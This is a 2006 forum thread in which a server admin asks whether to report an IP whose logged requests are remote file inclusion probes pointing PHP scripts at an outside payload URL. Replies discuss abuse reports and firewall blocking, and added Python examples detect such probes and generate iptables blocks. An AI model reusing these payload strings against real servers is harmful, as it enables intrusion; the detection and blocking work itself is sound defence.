Should I report IPs that behave suspiciously? And if so, how?

tarquel

Hi all

I've been looking at my logs and I've noticed a certain IP trying all sorts of things...

As far as I know, the individual is not getting anywhere.

Here are some excerpts from the logs:

2006-11-23 07:50:39 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "MAIL FROM: <[email protected]>" H=mail.cablevision.at [217.16.115.7] next input="RCPT TO: <[email protected]>\r\n"
2006-11-23 07:50:39 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "MAIL FROM: <[email protected]>" H=mail.cablevision.at [217.16.115.7] next input="RCPT TO: <[email protected]>\r\n"

I assume in this one the person is trying to direct emails from PayPal to his address....

[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/init.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/phpdig/includes/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/modules/My_eGallery/public/displayCategory.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/gallery/init.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/nuke/modules/My_eGallery/public/displayCategory.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/My_eGallery/public/displayCategory.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/oneadmin/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/oneadmin/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html//gallery/init.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/phpdig/includes/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/ezupload/index.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/oneadmin/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/nuke/modules/My_eGallery/public/displayCategory.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/ezupload/index.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/ezupload/index.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/index.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html//gallery/init.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/index.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/index.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/init.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/http://217.91.89.145/http://69.20.42.178/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/http://217.91.89.145/http://69.20.42.178/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/http://217.91.89.145/http://69.20.42.178/config.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /home/admin/domains/sharedip/404.shtml
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/gallery/init.php
[Thu Nov 23 23:17:00 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/config.php
[Thu Nov 23 23:17:01 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/oneadmin/config.php
[Thu Nov 23 23:17:03 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/gallery/init.php
[Thu Nov 23 23:17:03 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/config.php
[Thu Nov 23 23:17:03 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/oneadmin/config.php
[Thu Nov 23 23:17:03 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/ezupload/index.php
[Thu Nov 23 23:17:04 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/index.php
[Thu Nov 23 23:17:04 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/http://217.91.89.145/http://69.20.42.178/config.php
[Thu Nov 23 23:17:04 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/ezupload/index.php
[Thu Nov 23 23:17:04 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/index.php
[Thu Nov 23 23:17:04 2006] [error] [client 217.16.115.7] File does not exist: /var/www/html/http://217.91.89.145/http://69.20.42.178/config.php

There's a lot more on this one - he has been trying a lot.

217.16.115.7 - - [23/Nov/2006:23:16:58 +0000] "GET /gallery/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:58 +0000] "GET /config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /services/support/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /gallery/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /search/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /services/support/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /search/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /buscar/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /phpDig/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /buscar/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /My_eGallery/public/displayCategory.php?adminpath=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /phpDig/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /phpdig/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /nuke/modules/My_eGallery/public/displayCategory.php?adminpath=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /My_eGallery/public/displayCategory.php?adminpath=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET //gallery/init.php?HTTP_POST_VARS=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /phpdig/includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /nuke/modules/My_eGallery/public/displayCategory.php?adminpath=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET //gallery/init.php?HTTP_POST_VARS=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /init.php?HTTP_POST_VARS=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /gallery/init.php?HTTP_POST_VARS=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:01 +0000] "GET /oneadmin/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:03 +0000] "GET /gallery/init.php?HTTP_POST_VARS=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:03 +0000] "GET /config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:03 +0000] "GET /oneadmin/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:03 +0000] "GET /ezupload/index.php?path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:04 +0000] "GET /index.php?path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:04 +0000] "GET /http://217.91.89.145/http://69.20.42.178/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:04 +0000] "GET /ezupload/index.php?path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:04 +0000] "GET /index.php?path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:04 +0000] "GET /http://217.91.89.145/http://69.20.42.178/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

[lol win98 - he better look at his/her own security lmao]

Should I just block the IP from any sort of access to the server? [If so, how? - as I haven't done it before] Or should I report the IP with these sections of the logs to someone?

If so, is there a procedure someone can point me to?

Cheers
Nath.
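An added example, not part of the original post or its logs: a small Python script that does the check a practitioner would want over lines like the ones quoted above. Three sample lines are taken from the quoted access log; the other two (192.0.2.10, 198.51.100.7 and 203.0.113.5 are RFC 5737 documentation addresses) are constructed to show a benign request and a probe that the server answered with 200. It parses Apache combined-format lines, flags any query parameter whose value is a remote URL (the remote file inclusion signature in the probes above) and summarizes per client IP, so the question that matters, whether any probe was actually served rather than 404'd, is answered directly.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Three lines are taken from the access log quoted in the post; the last two are
# constructed (RFC 5737 documentation addresses) to show a benign request and a
# probe that the server actually answered with 200.
SAMPLE_ACCESS_LOG = """\
217.16.115.7 - - [23/Nov/2006:23:16:58 +0000] "GET /gallery/config.php?path[docroot]=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:16:59 +0000] "GET /includes/config.php?relative_script_path=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.16.115.7 - - [23/Nov/2006:23:17:00 +0000] "GET /gallery/init.php?HTTP_POST_VARS=http://147.91.172.35/.bills/t.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
192.0.2.10 - - [23/Nov/2006:23:18:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Nov/2006:23:19:30 +0000] "GET /index.php?path=http://203.0.113.5/shell.txt? HTTP/1.1" 200 2048 "-" "-"
"""

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value that is itself a URL is the signature of a remote file
# inclusion probe: the scanner hopes the script does include($param . '/x.php'),
# and the trailing '?' turns that suffix into a query string for the attacker's
# server, so whatever is appended, the file fetched is always the same t.txt.
REMOTE_URL = re.compile(r'^(?:https?|ftps?)://(?P<host>[^/?#\s]+)', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip('\n'))
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    return rec


def rfi_findings(lines):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec['target'])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            m = REMOTE_URL.match(value)
            if m is None:
                continue
            findings.append({
                'ip': rec['ip'],
                'ts': rec['ts'],
                'script': parts.path,
                'param': name,
                'remote_host': m.group('host'),
                'status': rec['status'],
            })
    return findings


def summarize_by_ip(findings):
    """Aggregate per client: probe count, payload hosts, scripts tried, and whether any probe got a 2xx."""
    summary = {}
    for f in findings:
        s = summary.setdefault(f['ip'], {
            'probes': 0, 'remote_hosts': set(), 'scripts': set(), 'served_2xx': False})
        s['probes'] += 1
        s['remote_hosts'].add(f['remote_host'])
        s['scripts'].add(f['script'])
        if 200 <= f['status'] < 300:
            s['served_2xx'] = True
    return summary


if __name__ == '__main__':
    summary = summarize_by_ip(rfi_findings(SAMPLE_ACCESS_LOG.splitlines()))
    for ip, s in sorted(summary.items()):
        flag = 'CHECK SERVER: a probe was answered 2xx' if s['served_2xx'] else 'all probes failed'
        print(f"{ip}: {s['probes']} RFI probes, payload from {sorted(s['remote_hosts'])}; {flag}")
```

A 404 on every probe, as in the quoted logs, means the scanner was looking for applications that are not installed; the line to act on is a 2xx for a request carrying a remote URL, because then the script exists and may have fetched the payload.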
 
Honestly, you will probably get nowhere, but you can look up the owner of the IP address on www.dnsstuff.com (using the IP whois) and report your logs to their abuse email address.

99% of the time you will get no response and will have no idea if the ISP/data center did anything about it.

Best idea is to ban them with your firewall and report if you have the time.

Regarding your logs, odds are that is a compromised zombie machine with malware on it trying to attack other hosts.
 
If the mail is rejected, it's a bad idea to block the IP with the firewall.

This is a server, so you will find a lot of funny things in the log.
Don't worry, just keep your server & firewall up to date.
 
xemaps,

You continue to post questionable opinions as fact.

Why is it a bad idea to block badly behaving servers at the firewall level by IP#?

Jeff
 
Jeff,

Imagine you have a lot of IPs blocked by the firewall; this takes some resources, more than if you don't block and just reject the mail because it's malformed.
If you reject, the mail returns to the sender and mostly follows retry rules depending on the message (or has to, per RFC rules).
If you block by firewall, there is no message, no one knows what happened, and you can of course end up being blacklisted.
Then the retries (of course!) from the sender can take resources by trying to send the mail again and again; this acts like a small DDoS attack.
Multiply that by the number of IPs blocked in the firewall.
And I'm not sure it's RFC compliant to block IPs just because you received one bad email. You can have on the same IP a good mail sender AND a bad mail sender with different server names (virtual hosts...).

Sure, I tried both solutions! You can see the server load.
Firewall is just for extreme special cases.

This is my opinion, but not only mine...
 
Thanks for the reply. You make some good points.

As far as machine load is concerned, blocking at the firewall (kernel) level uses the least machine resources.

We don't block at the firewall level after only one mail. But we certainly block problematic IP#s.

Jeff
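An added example, written for this page and not code from any of the posters: the policy Jeff describes (block at the firewall, but never after a single event) as a threshold-within-window rule whose blocks expire, so the firewall table does not grow without bound. A lone SMTP reject or 404 stays with the daemon, which answers the client and leaves normal retry behaviour intact; only an address that keeps hammering inside the window gets a DROP, and only for a fixed time. The threshold, window and expiry values, the event list and the 192.0.2.25 address (RFC 5737 documentation range) are assumptions for illustration; the script emits iptables commands as text rather than running them.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Policy knobs; these numbers are assumptions for the example, not values from the thread.
THRESHOLD = 10                    # this many hostile events ...
WINDOW = timedelta(minutes=10)    # ... inside this span trigger a block
BLOCK_TTL = timedelta(hours=24)   # blocks expire so the firewall table stays small


def parse_apache_ts(text):
    """Parse an Apache timestamp such as '23/Nov/2006:23:17:00 +0000'."""
    return datetime.strptime(text, '%d/%b/%Y:%H:%M:%S %z')


class BlockPolicy:
    """Decide when an address has earned a firewall DROP instead of per-request rejects.

    A single rejected mail or a single 404 is left to the daemon: the client gets a
    reply and the usual SMTP retry rules apply. Only an address that crosses
    THRESHOLD events inside WINDOW is dropped, and only for BLOCK_TTL.
    """

    def __init__(self, threshold=THRESHOLD, window=WINDOW, ttl=BLOCK_TTL):
        self.threshold = threshold
        self.window = window
        self.ttl = ttl
        self.recent = defaultdict(deque)   # ip -> timestamps of events still inside the window
        self.blocked = {}                   # ip -> block expiry

    def observe(self, ip, ts):
        """Record one hostile event. Return the block expiry if this event triggers a block."""
        if ip in self.blocked and ts < self.blocked[ip]:
            return None                     # already dropped; nothing new to do
        q = self.recent[ip]
        q.append(ts)
        while q and ts - q[0] > self.window:
            q.popleft()                     # forget events that fell out of the window
        if len(q) < self.threshold:
            return None
        expiry = ts + self.ttl
        self.blocked[ip] = expiry
        q.clear()
        return expiry

    def active_blocks(self, now):
        """Addresses whose block has not expired at time `now`."""
        return {ip: exp for ip, exp in self.blocked.items() if exp > now}

    def iptables_commands(self, now):
        """Rules for the active blocks; a deployment would run these and delete them on expiry."""
        return [f'iptables -I INPUT -s {ip} -j DROP' for ip in sorted(self.active_blocks(now))]


def apply_events(events, policy=None):
    """Feed (ip, apache_timestamp, source) events; return the policy and the blocks it triggered."""
    policy = policy or BlockPolicy()
    triggered = []
    for ip, ts_text, source in events:
        expiry = policy.observe(ip, parse_apache_ts(ts_text))
        if expiry is not None:
            triggered.append((ip, source, expiry))
    return policy, triggered


# Constructed events: one SMTP reject from an unrelated host (documentation address),
# then the scanner's burst of probes, seven per second for six seconds.
SAMPLE_EVENTS = [('192.0.2.25', '23/Nov/2006:07:50:39 +0000', 'exim pipelining reject')] + [
    ('217.16.115.7', f'23/Nov/2006:23:17:{sec:02d} +0000', 'apache 404 RFI probe')
    for sec in range(0, 6) for _ in range(7)
]


if __name__ == '__main__':
    policy, triggered = apply_events(SAMPLE_EVENTS)
    for ip, source, expiry in triggered:
        print(f'block {ip} (last trigger: {source}) until {expiry.isoformat()}')
    for cmd in policy.iptables_commands(parse_apache_ts('23/Nov/2006:23:30:00 +0000')):
        print(cmd)
```

Removing an expired rule is the mirror image of adding it (`iptables -D INPUT -s <ip> -j DROP`); what matters for the load argument in this thread is that the kernel drops the packet before any daemon spends a process on it, while the expiry keeps the rule count bounded.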
 